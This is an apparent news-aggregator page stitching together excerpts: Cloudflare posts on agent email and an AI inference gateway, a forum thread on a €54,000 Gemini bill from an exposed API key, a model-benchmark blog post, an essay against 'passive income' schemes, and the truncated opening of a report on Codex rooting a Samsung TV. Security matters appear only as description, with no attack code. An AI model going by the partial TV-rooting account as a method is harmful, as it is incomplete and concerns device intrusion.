Secure re­ply rout­ing is built in. When your agent sends an email and ex­pects a re­ply, you can sign the rout­ing head­ers with HMAC-SHA256 so that replies route back to the ex­act agent in­stance that sent the orig­i­nal mes­sage. This pre­vents at­tack­ers from forg­ing head­ers to route emails to ar­bi­trary agent in­stances — a se­cu­rity con­cern that most email for agents” so­lu­tions haven’t ad­dressed.

This is the com­plete email agent pipeline that teams are build­ing from scratch else­where: re­ceive email, parse it, clas­sify it, per­sist state, kick off async work­flows, re­ply or es­ca­late — all within a sin­gle Agent class, de­ployed glob­ally on Cloudflare’s net­work.

Email Service is­n’t only for agents run­ning on Cloudflare. Agents run every­where, whether it’s cod­ing agents like Claude Code, Cursor, or Copilot run­ning lo­cally or in re­mote en­vi­ron­ments, or pro­duc­tion agents run­ning in con­tain­ers or ex­ter­nal clouds. They all need to send email from those en­vi­ron­ments. We’re ship­ping three in­te­gra­tions that make Email Service ac­ces­si­ble to any agent, re­gard­less of where it runs.

Email is now avail­able through the Cloudflare MCP server, the same Code Mode-powered server that gives agents ac­cess to the en­tire Cloudflare API. With this MCP server, your agent can dis­cover and call the Email end­points to send and con­fig­ure emails. You can send an email with a sim­ple prompt:

Send me a no­ti­fi­ca­tion email at [email protected] from my stag­ing do­main when the build com­pletes”

For agents run­ning on a com­puter or a sand­box with bash ac­cess, the Wrangler CLI solves the MCP con­text win­dow prob­lem that we dis­cussed in the Code Mode blog post — tool de­f­i­n­i­tions can con­sume tens of thou­sands of to­kens be­fore your agent even starts pro­cess­ing a sin­gle mes­sage. With Wrangler, your agent starts with near-zero con­text over­head and dis­cov­ers ca­pa­bil­i­ties on de­mand through `–help` com­mands. Here is how your agent can send an email via Wrangler:

wran­gler email send \

–to [email protected]” \

–from [email protected]” \

–subject Build com­pleted” \

–text The build passed. Deployed to stag­ing.”

Regardless of whether you give your agent the Cloudflare MCP or the Wrangler CLI, your agent will be able to now send emails on your be­half with just a prompt.

We are also pub­lish­ing a Cloudflare Email Service skill. It gives your agents com­plete guid­ance: con­fig­ur­ing the Workers bind­ing, send­ing emails via the REST API or SDKs, han­dling in­bound email with Email Routing con­fig­u­ra­tion, build­ing with Agents SDK, and man­ag­ing email through Wrangler CLI or MCP. It also cov­ers de­liv­er­abil­ity best prac­tices and how to craft good trans­ac­tional emails that land in in­boxes rather than spam. Drop it into your pro­ject and your cod­ing agent has every­thing needed to build pro­duc­tion-ready email on Cloudflare.

During the pri­vate beta, we also ex­per­i­mented with email agents. It be­came clear that you of­ten want to keep the hu­man-in-the-loop el­e­ment to re­view emails and see what the agent is do­ing. The best way to do that is to have a fully fea­tured email client with agent au­toma­tions built-in.

That’s why we built Agentic Inbox: a ref­er­ence ap­pli­ca­tion with full con­ver­sa­tion thread­ing, email ren­der­ing, re­ceiv­ing and stor­ing emails and their at­tach­ments, and au­to­mat­i­cally re­ply­ing to emails. It in­cludes a ded­i­cated MCP server built-in, so ex­ter­nal agents can draft emails for your re­view be­fore send­ing from your agen­tic-in­box.

We’re open-sourc­ing Agentic Inbox as a ref­er­ence ap­pli­ca­tion for how to build a full email ap­pli­ca­tion us­ing Email Routing for in­bound, Email Sending for out­bound, Workers AI for clas­si­fi­ca­tion, R2 for at­tach­ments, and Agents SDK for state­ful agent logic. You can de­ploy it to­day to get a full in­box, email client and agent for your emails, with the click of a but­ton.

We want email agent tool­ing to be com­pos­able and reusable. Rather than every team re­build­ing the same in­bound-clas­sify-re­ply pipeline, start with this ref­er­ence ap­pli­ca­tion. Fork it, ex­tend it, use it as a start­ing point for your own email agents that fit your work­flows.

Email is where the world’s most im­por­tant work­flows live, but for agents, it has of­ten been a dif­fi­cult chan­nel to reach. With Email Sending now in pub­lic beta, Cloudflare Email Service be­comes a com­plete plat­form for bidi­rec­tional com­mu­ni­ca­tion, mak­ing the in­box a first-class in­ter­face for your agents.

Whether you’re build­ing a sup­port agent that meets cus­tomers in their in­box or a back­ground process that keeps your team up­dated in real time, your agents now have a seam­less way to com­mu­ni­cate on a global scale. The in­box is no longer a silo. Now it’s one more place for your agents to be help­ful.

Try out Email Sending in the Cloudflare DashboardCheck out the Email Service MCP server and Skills

...

Read the original on blog.cloudflare.com »

5 382 shares, 9 trendiness

Firebase browser key without API restrictions used for Gemini requests

We are look­ing for guid­ance re­gard­ing an un­ex­pected €54,000+ Gemini API charge that oc­curred within a few hours af­ter en­abling Firebase AI Logic on an ex­ist­ing Firebase pro­ject.

We cre­ated the pro­ject over a year ago and ini­tially used it only for Firebase Authentication. Recently, we added a sim­ple AI fea­ture (generating a web snip­pet from a text prompt) and en­abled Firebase AI Logic.

Shortly af­ter en­abling this, we ex­pe­ri­enced a sud­den and ex­treme spike in Gemini API us­age. The traf­fic was not cor­re­lated with our ac­tual users and ap­peared to be au­to­mated. The ac­tiv­ity oc­curred within a short overnight win­dow and stopped once we dis­abled the API and ro­tated cre­den­tials.

We had a bud­get alert (€80) and a cost anom­aly alert, both of which trig­gered with a de­lay of a few hours

By the time we re­acted, costs were al­ready around €28,000

The fi­nal amount set­tled at €54,000+ due to de­layed cost re­port­ing

This de­scribes our is­sue in more de­tail:

Google API Keys Weren’t Secrets. But then Gemini Changed the Rules. ◆ Truffle…

Google spent over a decade telling de­vel­op­ers that Google API keys (like those used in Maps, Firebase, etc.) are not se­crets. But that’s no longer true.

We worked with Google Cloud sup­port and pro­vided logs and analy­sis. The charges were clas­si­fied as valid us­age be­cause they orig­i­nated from our pro­ject, and our re­quest for a billing ad­just­ment was ul­ti­mately de­nied.

This us­age was clearly anom­alous, not user-dri­ven, and does not re­flect in­tended or mean­ing­ful con­sump­tion of the ser­vice.

Has any­one en­coun­tered a sim­i­lar is­sue af­ter en­abling Firebase AI Logic or Gemini?

Are there rec­om­mended safe­guards be­yond App Check, quo­tas, and mov­ing calls server-side?

Is there any es­ca­la­tion path we may have missed for cases like this?

Any guid­ance or shared ex­pe­ri­ence would be greatly ap­pre­ci­ated.

Hey @zanbezi ! Sorry to hear about this. A few things:

We have billing ac­count caps rolled out to users of the Gemini API, see: https://​ai.google.dev/​gem­ini-api/​docs/​billing#tier-spend-caps, tier 1 users can spend $250 a month and then are cut off by de­fault (there is a 10 minute de­lay in all of the re­port­ing)

We now sup­port pro­ject spend caps, if you want to set a cus­tomer spend cap, you can also do that (I have my ac­count set at $50 so I don’t spend too much ac­ci­denlty when build­ing, the same 10 minute de­lay ap­plies here too): https://​ai.google.dev/​gem­ini-api/​docs/​billing#pro­ject-spend-caps

We are mov­ing to dis­able the us­age of un­re­stricted API keys in the Gemini API, should have more up­dates there soon.

We now gen­er­ate Auth keys by de­fault for new users (more se­cure key which did­n’t ex­ist when the Gemini API was orig­i­nally cre­ated a few years ago) and will have more to share there soon.

You should gen­er­ally avoid putting a key in client side code as if it is ex­posed, even with the re­stric­tions above you can in­cur costs.

In many cases, we can au­to­mat­i­cally de­tect when a key is vis­i­ble on the pub­lic web and shut down those keys au­to­mat­i­cally for se­cu­rity rea­sons (this hap­pened to me per­son­ally, I ac­ci­den­tally pushed my API key to the pub­lic API docs and it was shut down in min­utes).

By de­fault, keys gen­er­ated in Google AI Studio are re­stricted to just the Gemini API, no other ser­vices are en­abled. However keys gen­er­ated from other parts of Google Cloud have this cross ser­vice ca­pa­bil­ity, you can dou­ble check keys and make sure they are re­stricted for just the re­source you need.

Pls email me and our team can take a look into this case (Lkilpatrick@google.com), we take this all very se­ri­ous and have been push­ing hard to land all the fea­tures men­tioned above and more.

We just started the pre­paid billing roll­out which means you have to pay ahead of time to use the Gemini API, this is rolled out to all new US billing ac­counts as of yes­ter­day and rolling out glob­ally right now. This is yet an­other way to give de­vel­op­ers more con­trol over their spend­ing / costs and en­sure you know what you are sign­ing up for when us­ing the Gemini API.

I hope this helps and sorry for the has­sle on this ex­pe­ri­ence, pls email me if there is more to chat about!

Thanks for the de­tailed re­sponse, we re­ally ap­pre­ci­ate it. It is good to see that ad­di­tional safe­guards (like spend caps) are be­ing in­tro­duced.

I will reach out via email with the de­tails so your team can take a closer look.

Thanks again for tak­ing the time to re­spond.

Great to see you here Logan. This is the proper way to deal with a fi­asco like this one.

We work with com­pa­nies spend­ing $50K–$50M/year on cloud and see an av­er­age 33% over­spend. The fix usu­ally is­n’t bet­ter dash­boards — it’s hav­ing en­gi­neers ac­tu­ally re­view ar­chi­tec­ture and code along­side the billing data.

We’ve helped clients cut 25–60% by treat­ing it as an en­gi­neer­ing prob­lem, not a re­port­ing one. Happy to share more if use­ful.

...

Read the original on discuss.ai.google.dev »

6 368 shares, 30 trendiness

Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7

For any­one who has been (inadvisably) tak­ing my pel­i­can rid­ing a bi­cy­cle bench­mark se­ri­ously as a ro­bust way to test mod­els, here are pel­i­cans from this morn­ing’s two big model re­leases—Qwen3.6-35B-A3B from Alibaba and Claude Opus 4.7 from Anthropic.

Here’s the Qwen 3.6 pel­i­can, gen­er­ated us­ing this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf quan­tized model by Unsloth, run­ning on my MacBook Pro M5 via LM Studio (and the llm-lm­stu­dio plu­gin)—tran­script here:

And here’s one I got from Anthropic’s brand new Claude Opus 4.7 (transcript):

I’m giv­ing this one to Qwen 3.6. Opus man­aged to mess up the bi­cy­cle frame!

I tried Opus a sec­ond time pass­ing think­ing_level: max. It did­n’t do much bet­ter (transcript):

A lot of peo­ple are con­vinced that the labs train for my stu­pid bench­mark. I don’t think they do, but hon­estly this re­sult did give me a lit­tle glint of sus­pi­cion. So I’m burn­ing one of my se­cret backup tests—here’s what I got from Qwen3.6-35B-A3B and Opus 4.7 for Generate an SVG of a flamingo rid­ing a uni­cy­cle”:

I’m giv­ing this one to Qwen too, partly for the ex­cel­lent SVG com­ment.

The pel­i­can bench­mark has al­ways been meant as a joke—it’s mainly a state­ment on how ob­tuse and ab­surd the task of com­par­ing these mod­els is.

The weird thing about that joke is that, for the most part, there has been a di­rect cor­re­la­tion be­tween the qual­ity of the pel­i­cans pro­duced and the gen­eral use­ful­ness of the mod­els. Those first pel­i­cans from October 2024 were junk. The more re­cent en­tries have gen­er­ally been much, much bet­ter—to the point that Gemini 3.1 Pro pro­duces il­lus­tra­tions you could ac­tu­ally use some­where, pro­vided you had a press­ing need to il­lus­trate a pel­i­can rid­ing a bi­cy­cle.

Today, even that loose con­nec­tion to util­ity has been bro­ken. I have enor­mous re­spect for Qwen, but I very much doubt that a 21GB quan­tized ver­sion of their lat­est model is more pow­er­ful or use­ful than Anthropic’s lat­est pro­pri­etary re­lease.

If the thing you need is an SVG il­lus­tra­tion of a pel­i­can rid­ing a bi­cy­cle though, right now Qwen3.6-35B-A3B run­ning on a lap­top is a bet­ter bet than Opus 4.7!

...

Read the original on simonwillison.net »

7 341 shares, 18 trendiness

Thunderbolt — AI You Control

...

Read the original on www.thunderbolt.io »

8 264 shares, 14 trendiness

an inference layer designed for agents

AI mod­els are chang­ing quickly: the best model to use for agen­tic cod­ing to­day might in three months be a com­pletely dif­fer­ent model from a dif­fer­ent provider. On top of this, real-world use cases of­ten re­quire call­ing more than one model. Your cus­tomer sup­port agent might use a fast, cheap model to clas­sify a user’s mes­sage; a large, rea­son­ing model to plan its ac­tions; and a light­weight model to ex­e­cute in­di­vid­ual tasks.

This means you need ac­cess to all the mod­els, with­out ty­ing your­self fi­nan­cially and op­er­a­tionally to a sin­gle provider. You also need the right sys­tems in place to mon­i­tor costs across providers, en­sure re­li­a­bil­ity when one of them has an out­age, and man­age la­tency no mat­ter where your users are.

These chal­lenges are pre­sent when­ever you’re build­ing with AI, but they get even more press­ing when you’re build­ing agents. A sim­ple chat­bot might make one in­fer­ence call per user prompt. An agent might chain ten calls to­gether to com­plete a sin­gle task and sud­denly, a sin­gle slow provider does­n’t add 50ms, it adds 500ms. One failed re­quest is­n’t a retry, but sud­denly a cas­cade of down­stream fail­ures.

Since launch­ing AI Gateway and Workers AI, we’ve seen in­cred­i­ble adop­tion from de­vel­op­ers build­ing AI-powered ap­pli­ca­tions on Cloudflare and we’ve been ship­ping fast to keep up! In just the past few months, we’ve re­freshed the dash­board, added zero-setup de­fault gate­ways, au­to­matic re­tries on up­stream fail­ures, and more gran­u­lar log­ging con­trols. Today, we’re mak­ing Cloudflare into a uni­fied in­fer­ence layer: one API to ac­cess any AI model from any provider, built to be fast and re­li­able.

Starting to­day, you can call third-party mod­els us­ing the same AI.run() bind­ing you al­ready use for Workers AI. If you’re us­ing Workers, switch­ing from a Cloudflare-hosted model to one from OpenAI, Anthropic, or any other provider is a one-line change.

For those who don’t use Workers, we’ll be re­leas­ing REST API sup­port in the com­ing weeks, so you can ac­cess the full model cat­a­log from any en­vi­ron­ment.

We’re also ex­cited to share that you’ll now have ac­cess to 70+ mod­els across 12+ providers — all through one API, one line of code to switch be­tween them, and one set of cred­its to pay for them. And we’re quickly ex­pand­ing this as we go.

You can browse through our model cat­a­log to find the best model for your use case, from open-source mod­els hosted on Cloudflare Workers AI to pro­pri­etary mod­els from the ma­jor model providers. We’re ex­cited to be ex­pand­ing ac­cess to mod­els from Alibaba Cloud, AssemblyAI, Bytedance, Google, InWorld, MiniMax, OpenAI, Pixverse, Recraft, Runway, and Vidu — who will pro­vide their mod­els through AI Gateway. Notably, we’re ex­pand­ing our model of­fer­ings to in­clude im­age, video, and speech mod­els so that you can build mul­ti­modal ap­pli­ca­tions

Accessing all your mod­els through one API also means you can man­age all your AI spend in one place. Most com­pa­nies to­day are call­ing an av­er­age of 3.5 mod­els across mul­ti­ple providers, which means no one provider is able to give you a holis­tic view of your AI us­age. With AI Gateway, you’ll get one cen­tral­ized place to mon­i­tor and man­age AI spend.

By in­clud­ing cus­tom meta­data with your re­quests, you can get a break­down of your costs on the at­trib­utes that you care about most, like spend by free vs. paid users, by in­di­vid­ual cus­tomers, or by spe­cific work­flows in your app.

AI Gateway gives you ac­cess to mod­els from all the providers through one API. But some­times you need to run a model you’ve fine-tuned on your own data or one op­ti­mized for your spe­cific use case. For that, we are work­ing on let­ting users bring their own model to Workers AI.

The over­whelm­ing ma­jor­ity of our traf­fic comes from ded­i­cated in­stances for Enterprise cus­tomers who are run­ning cus­tom mod­els on our plat­form, and we want to bring this to more cus­tomers. To do this, we lever­age Replicate’s Cog tech­nol­ogy to help you con­tainer­ize ma­chine learn­ing mod­els.

Cog is de­signed to be quite sim­ple: all you need to do is write down de­pen­den­cies in a cog.yaml file, and your in­fer­ence code in a Python file. Cog ab­stracts away all the hard things about pack­ag­ing ML mod­els, such as CUDA de­pen­den­cies, Python ver­sions, weight load­ing, etc.

Example of a pre­dict.py file, which has a func­tion to set up the model and a func­tion that runs when you re­ceive an in­fer­ence re­quest (a pre­dic­tion):

from cog im­port BasePredictor, Path, Input

im­port torch

class Predictor(BasePredictor):

def setup(self):

″“”Load the model into mem­ory to make run­ning mul­ti­ple pre­dic­tions ef­fi­cient”“”

self.net = torch.load(“weights.pth”)

def pre­dict(self,

im­age: Path = Input(description=“Image to en­large”),

scale: float = Input(description=“Factor to scale im­age by”, de­fault=1.5)

) -> Path:

″“”Run a sin­gle pre­dic­tion on the model”“”

# … pre-pro­cess­ing …

out­put = self.net(in­put)

# … post-pro­cess­ing …

re­turn out­put

Then, you can run cog build to build your con­tainer im­age, and push your Cog con­tainer to Workers AI. We will de­ploy and serve the model for you, which you then ac­cess through your usual Workers AI APIs.

We’re work­ing on some big pro­jects to be able to bring this to more cus­tomers, like cus­tomer-fac­ing APIs and wran­gler com­mands so that you can push your own con­tain­ers, as well as faster cold starts through GPU snap­shot­ting. We’ve been test­ing this in­ter­nally with Cloudflare teams and some ex­ter­nal cus­tomers who are guid­ing our vi­sion. If you’re in­ter­ested in be­ing a de­sign part­ner with us, please reach out! Soon, any­one will be able to pack­age their model and use it through Workers AI.

Using Workers AI mod­els with AI Gateway is par­tic­u­larly pow­er­ful if you’re build­ing live agents — where a user’s per­cep­tion of speed hinges on time to first to­ken or how quickly the agent starts re­spond­ing, rather than how long the full re­sponse takes. Even if to­tal in­fer­ence is 3 sec­onds, get­ting that first to­ken 50ms faster makes the dif­fer­ence be­tween an agent that feels zippy and one that feels slug­gish.

Cloudflare’s net­work of data cen­ters in 330 cities around the world means AI Gateway is po­si­tioned close to both users and in­fer­ence end­points, min­i­miz­ing the net­work time be­fore stream­ing be­gins.

Workers AI also hosts open-source mod­els on its pub­lic cat­a­log, which now in­cludes large mod­els pur­pose-built for agents, in­clud­ing Kimi K2.5 and real-time voice mod­els. When you call these Cloudflare-hosted mod­els through AI Gateway, there’s no ex­tra hop over the pub­lic Internet since your code and in­fer­ence run on the same global net­work, giv­ing your agents the low­est la­tency pos­si­ble.

When build­ing agents, speed is not the only fac­tor that users care about — re­li­a­bil­ity mat­ters too. Every step in an agent work­flow de­pends on the steps be­fore it. Reliable in­fer­ence is cru­cial for agents be­cause one call fail­ing can af­fect the en­tire down­stream chain.

Through AI Gateway, if you’re call­ing a model that’s avail­able on mul­ti­ple providers and one provider goes down, we’ll au­to­mat­i­cally route to an­other avail­able provider with­out you hav­ing to write any failover logic of your own.

If you’re build­ing long-run­ning agents with Agents SDK, your stream­ing in­fer­ence calls are also re­silient to dis­con­nects. AI Gateway buffers stream­ing re­sponses as they’re gen­er­ated, in­de­pen­dently of your agen­t’s life­time. If your agent is in­ter­rupted mid-in­fer­ence, it can re­con­nect to AI Gateway and re­trieve the re­sponse with­out hav­ing to make a new in­fer­ence call or pay­ing twice for the same out­put to­kens. Combined with the Agents SDKs built-in check­point­ing, the end user never no­tices.

The Replicate team has of­fi­cially joined our AI Platform team, so much so that we don’t even con­sider our­selves sep­a­rate teams any­more. We’ve been hard at work on in­te­gra­tions be­tween Replicate and Cloudflare, which in­clude bring­ing all the Replicate mod­els onto AI Gateway and re­plat­form­ing the hosted mod­els onto Cloudflare in­fra­struc­ture. Soon, you’ll be able to ac­cess the mod­els you loved on Replicate through AI Gateway, and host the mod­els you de­ployed on Replicate on Workers AI as well.

To get started, check out our doc­u­men­ta­tion for AI Gateway or Workers AI. Learn more about build­ing agents on Cloudflare through Agents SDK.

...

Read the original on blog.cloudflare.com »

9 264 shares, 24 trendiness

The "Passive Income" trap ate a generation of entrepreneurs

I had cof­fee last year with a guy - I won’t use his real name - who told me he was building a busi­ness.” I asked what it did. Dropshipping jade face rollers.

I made him say it twice.

He’d found them on Alibaba for $1.20 each, and started sell­ing them through Shopify for $29.99. Never used one him­self. Didn’t re­ally know what they were for - some­thing about lym­phatic drainage? Reducing puffi­ness? He said lymphatic” the way you say a word you’ve only ever read and never heard out loud.

Some guy on YouTube said jade rollers were trending,” the mar­gins looked in­sane on pa­per, so he’d built” a web­site with stock pho­tos of a dewy-skinned woman rolling a green rock across her cheek­bone and started run­ning Facebook ads at $50 a day. Customers would email ask­ing where their stuff was - ship­ping from Guangzhou, three to six weeks, some­times way longer - and he’d copy-paste a re­sponse he found on a drop­ship­ping sub­red­dit. He had a Google Doc full of pre-writ­ten cus­tomer ser­vice replies.

Five months in, he was $800 in the hole.

He told me all this like he’d in­vented the wheel.

I bought him an­other cof­fee. I gen­uinely had no idea what else to do.

Jade Roller Guy has be­come my go-to ex­am­ple of some­thing that went dras­ti­cally, ter­ri­bly wrong with how a whole gen­er­a­tion of would-be en­tre­pre­neurs thought about work and money. A spe­cific ide­ol­ogy - I’ve been call­ing it Passive Income Brain - grabbed a huge chunk of the peo­ple who were, by tem­pera­ment and abil­ity, most likely to start real busi­nesses, and it gave them a com­pletely fucked set of pri­or­i­ties.

Somewhere be­tween 2015 and 2022, passive in­come” stopped be­ing a bor­ing fi­nan­cial plan­ning term and be­came, I don’t know how else to put this, a sal­va­tion nar­ra­tive. I mean that lit­er­ally. There was an es­cha­tol­ogy if you want to get nerdy about it. The Rapture was the day your passive in­come” ex­ceeded your monthly ex­penses and you could quit your job for­ever. People talked about it with that ex­act en­ergy.

But, of course, the folks mak­ing any ac­tual in­come, of any kind, were the ones sell­ing courses about mak­ing pas­sive in­come. It was an ouroboros. It was an ouroboros that had in­cor­po­rated in Delaware and was run­ning Facebook ads.

The pitch went some­thing like: you, a sucker, cur­rently trade your time for money. This is what em­ploy­ees do, and em­ploy­ees are suck­ers. (I’m para­phras­ing, but not by much.) Smart peo­ple build SYSTEMS. A sys­tem is any­thing that gen­er­ates rev­enue with­out your on­go­ing in­volve­ment. Write an ebook. Build a drop­ship­ping store. Create an on­line course. Set up af­fil­i­ate web­sites.

The spe­cific ve­hi­cle does­n’t mat­ter be­cause the im­por­tant thing is­n’t what you build, it’s the struc­ture. You want a ma­chine that gen­er­ates cash while you sleep, and once you have that ma­chine, you are free.

Free to do what? Sit on a beach, ap­par­ently. Every sin­gle one of these peo­ple wanted to sit on a beach. I’ve never un­der­stood this. Have they been to a beach? There’s sand. It gets every­where. You can sit there for maybe three hours be­fore you want to do lit­er­ally any­thing else.

The al­lure is real. Who does­n’t want money that shows up while you sleep?

I’d fuck­ing love that. I’d love it very much in­deed. But passive in­come” as an or­ga­niz­ing phi­los­o­phy for your en­tire busi­ness life, for how you think about work, is al­most per­fectly de­signed to pro­duce garbage.

When you make passivity” the thing you’re op­ti­miz­ing for, you stop car­ing about any­thing a cus­tomer might ac­tu­ally want. Caring is ac­tive. Caring takes time. Caring is work.

Giving a shit is, by de­f­i­n­i­tion, not pas­sive.

Between 2019 and 2021, roughly 700,000 new Shopify stores opened. The plat­form went from about a mil­lion mer­chants to 1.7 mil­lion in two years. About 90% of those stores failed within their first year. Which is re­ally more a meat grinder, than it is a busi­ness model…

We started drown­ing in a mil­lion busi­nesses no­body was ac­tu­ally run­ning. Dropshipping stores with six-week ship­ping times and cus­tomer ser­vice that was just copy-pasted tem­plates. Guys who’d put their brand name” - usu­ally some­thing like ZENITHPRO or AXELVIBE, al­ways in all caps, al­ways vaguely ag­gres­sive - on a gar­lic press iden­ti­cal to four hun­dred other gar­lic presses on the same Amazon page. AXELVIBE! For a gar­lic press!

And the af­fil­i­ate blogs! Hundreds of thou­sands of them, pumped full of SEO-optimized re­views of prod­ucts the au­thors had never touched, never even seen in per­son. A frac­tal of bull­shit that tech­ni­cally qual­i­fies as com­merce but puts zero dol­lars of ac­tual value into the world.

Leverage is real; I’m not dis­put­ing that. There is a dif­fer­ence be­tween trad­ing hours for dol­lars and build­ing some­thing that scales. Software does this. Publishing does this. You write a book once, sell it many times, no­body calls that a scam. Fine! That part they got right!

Where it went wrong is that the whole move­ment con­fused build a good prod­uct that scales” with build any mech­a­nism that ex­tracts money with­out you be­ing in­volved.” I don’t think that con­fu­sion was ac­ci­den­tal. I think the con­fu­sion was the point. Because if you’re teach­ing peo­ple to build real busi­nesses, you have to sit with hard, bor­ing ques­tions about whether any­one ac­tu­ally wants what you’re sell­ing. But if you’re teach­ing peo­ple to build passive in­come streams” you can skip all of that and go straight to the fun tac­ti­cal shit. How to run Facebook ads, how to set up a Shopify store in a week­end, how to write email se­quences that ma­nip­u­late peo­ple into buy­ing things they don’t need.

Nobody talks enough about what the pas­sive in­come move­ment did to the con­tent qual­ity of the en­tire in­ter­net. If you’ve tried to google best [anything]” in the last five years and got­ten a wall of nearly iden­ti­cal lis­ti­cles, all with the same struc­ture (“We tested 47 blenders so you don’t have to!“), all mak­ing the same rec­om­men­da­tions, all link­ing to the same Amazon prod­ucts, you’ve ex­pe­ri­enced the re­sults.

Those ar­ti­cles weren’t writ­ten by peo­ple who cared whether you bought a good blender. They were writ­ten by peo­ple who cared whether you clicked their af­fil­i­ate link, be­cause that’s what gen­er­ated pas­sive in­come, and the in­cen­tives made hon­esty ac­tively coun­ter­pro­duc­tive.

The hon­est re­view of blenders is: most blenders are fine, just get what­ev­er’s on sale, the dif­fer­ences be­low $100 are ba­si­cally mean­ing­less.” That re­view gen­er­ates zero af­fil­i­ate rev­enue. So no­body wrote it.

Instead you got The Vitamix A3500 is our #1 pick!” with a nice af­fil­i­ate link, writ­ten by some­one who has never blended any­thing in their life. Multiply this across every prod­uct cat­e­gory and you start to un­der­stand the in­for­ma­tional desert we’ve been liv­ing in. We broke Google re­sults, at least partly, be­cause an army of pas­sive in­come seek­ers had an in­cen­tive to flood the in­ter­net with plau­si­ble-sound­ing garbage.

I’ve met dozens of smart, ca­pa­ble peo­ple who had ac­tual en­ergy, and who spent their en­tire twen­ties bounc­ing be­tween pas­sive in­come schemes in­stead of build­ing real skills // real busi­nesses // real ca­reers. The pat­tern was al­ways the same: six months on a drop­ship­ping store, it fails, pivot to Amazon FBA, that fails, pivot to cre­at­ing a course about drop­ship­ping (because of course), and then the course does­n’t sell ei­ther be­cause by 2021 there were ap­prox­i­mately forty thou­sand courses about drop­ship­ping and the mar­ket had been sat­u­rated since be­fore they started.

And the whole time they were get­ting fur­ther and fur­ther from the thing that ac­tu­ally cre­ates eco­nomic value, which is: find a real prob­lem, solve it for real peo­ple, care enough to stick around and keep im­prov­ing. The bor­ing thing. The thing that takes years. The thing that is, to be ab­solutely clear about this, not pas­sive.

I once saw a guy ask whether he should start a dog walk­ing busi­ness and the top re­sponse was some­thing like dog walk­ing is­n’t scal­able, you should build a dog walk­ing plat­form in­stead.” This per­son liked dogs! He liked walk­ing! He lived in a neigh­bor­hood full of busy pro­fes­sion­als with dogs!

But the Passive Income Brain thing had got­ten so deep into how peo­ple talked about busi­ness on­line that do the sim­ple ob­vi­ous thing that works for you” was con­sid­ered naive, and build a tech­nol­ogy plat­form for an ac­tiv­ity you’ve never ac­tu­ally done as a busi­ness” was con­sid­ered smart.

The dog walk­ing guy could have been prof­itable in a week.

The app guy would have burned through his sav­ings in six months and ended up with a land­ing page and no users.

By 2020 the pas­sive in­come world was ab­solutely crawl­ing with grift: guys pos­ing with rented Lamborghinis in YouTube thumb­nails, digital no­mads” whose ac­tual in­come came en­tirely from sell­ing the dream of be­ing a dig­i­tal no­mad to other as­pir­ing dig­i­tal no­mads, pod­cast hosts in­ter­view­ing each other in an end­less cir­cle of mu­tual pro­mo­tion where every­one claimed to make $30K/month and no­body could ex­plain what they ac­tu­ally pro­duced. By 2021 or so it started to look like a dis­trib­uted, so­cially ac­cept­able MLM. The prod­uct was the dream of not work­ing. The cus­tomers were peo­ple des­per­ate enough to pay for it.

Not every­one in this world was cyn­i­cal. I gen­uinely be­lieve that. A lot of the peo­ple sell­ing pas­sive in­come con­tent be­lieved their own pitch. They’d had some real suc­cess with a niche site - pulled $3,000/month for a while, it does hap­pen - read the same books every­one else read, fig­ured okay, I’ll teach other peo­ple my sys­tem. Why not. I would have done the same thing at 24. I’m al­most sure of it.

But zoom out and what you had was just an enor­mous ma­chine con­vert­ing hu­man am­bi­tion into noise. Affiliate spam // drop­shipped junk // ebooks about pas­sive in­come // courses about courses. An en­tire layer of the in­ter­net that was noth­ing but con­fi­dent-sound­ing bull­shit pro­duced by peo­ple who had op­ti­mized for every­thing ex­cept mak­ing some­thing worth buy­ing.

The peo­ple near the top made money. Everyone else spent months or years chas­ing a mi­rage and came out with noth­ing but a Shopify sub­scrip­tion they for­got to can­cel. They thought they’d failed. They had­n’t failed. The sys­tem, every sys­tem, failed them.

What ac­tu­ally makes money has­n’t changed. You find some­thing peo­ple need. You get good at pro­vid­ing it. You charge a fair price and you keep show­ing up even when it’s te­dious and even when you don’t want to. You build re­la­tion­ships over years. You build rep­u­ta­tion over years. None of it is pas­sive, and none of it has ever been pas­sive! All of it re­volves around giv­ing a shit, day af­ter day, about some­thing spe­cific. I don’t think any­one has ever found a way around that and I don’t think any­one will.

The pas­sive in­come thing was a fan­tasy about not hav­ing to give a shit.

This is a ter­ri­ble foun­da­tion for pretty much any­thing.

The af­fil­i­ate SEO blogs are be­ing slaugh­tered right now by AI-generated con­tent. The peo­ple who spent years pro­duc­ing al­go­rith­mi­cally op­ti­mized con­tent of no value to hu­mans are get­ting out­com­peted by soft­ware that does the ex­act same thing, faster and cheaper. Facebook ad costs went through the roof and took the drop­ship­ping gold rush with them. The biggest pas­sive in­come gu­rus have al­ready piv­oted to sell­ing AI courses. The ma­chine keeps run­ning. It just swaps out the brochure.

But I’ve no­ticed more peo­ple talk­ing about what I’d call give a shit” busi­nesses - peo­ple who make fur­ni­ture, run plumb­ing com­pa­nies, write soft­ware they ac­tu­ally use them­selves. Stuff where the an­swer to why does your busi­ness ex­ist?” is­n’t to gen­er­ate pas­sive in­come for me.” This works a lot bet­ter than the lap­top-on-the-beach grind.

Jade Roller Guy, if you’re out there: I hope you found some­thing real.

I hope it keeps you busy.

...

Read the original on www.joanwestenberg.com »

10 234 shares, 11 trendiness

Codex Hacked a Samsung TV

This post doc­u­ments our re­search into us­ing AI to hack hard­ware de­vices. We’d like to ac­knowl­edge OpenAI for part­ner­ing with us on this pro­ject. No TVs were se­ri­ously harmed dur­ing this re­search. One may have ex­pe­ri­enced mild dis­tress from be­ing re­peat­edly re­booted re­motely by an AI.We started with a shell in­side the browser ap­pli­ca­tion on a Samsung TV, and a fairly sim­ple ques­tion: if we gave Codex a re­li­able way to work against the live de­vice and the match­ing firmware source, could it take that foothold all the way to root?Codex had to enu­mer­ate the tar­get, nar­row the reach­able at­tack sur­face, au­dit the match­ing ven­dor dri­ver source, val­i­date a phys­i­cal-mem­ory prim­i­tive on the live de­vice, adapt its tool­ing to Samsung’s ex­e­cu­tion re­stric­tions, and it­er­ate un­til the browser process be­came root on a real com­pro­mised de­vice.We did­n’t pro­vide a bug or an ex­ploit recipe. We pro­vided an en­vi­ron­ment Codex could ac­tu­ally op­er­ate in, and the eas­i­est way to un­der­stand it is to look at the pieces sep­a­rately.KantS2 is Samsung’s in­ter­nal plat­form name for the Smart TV firmware used on this de­vice model.The setup looked like this:[1] Browser foothold: we al­ready had code ex­e­cu­tion in­side the browser ap­pli­ca­tion’s own se­cu­rity con­text on the TV, which meant the task was 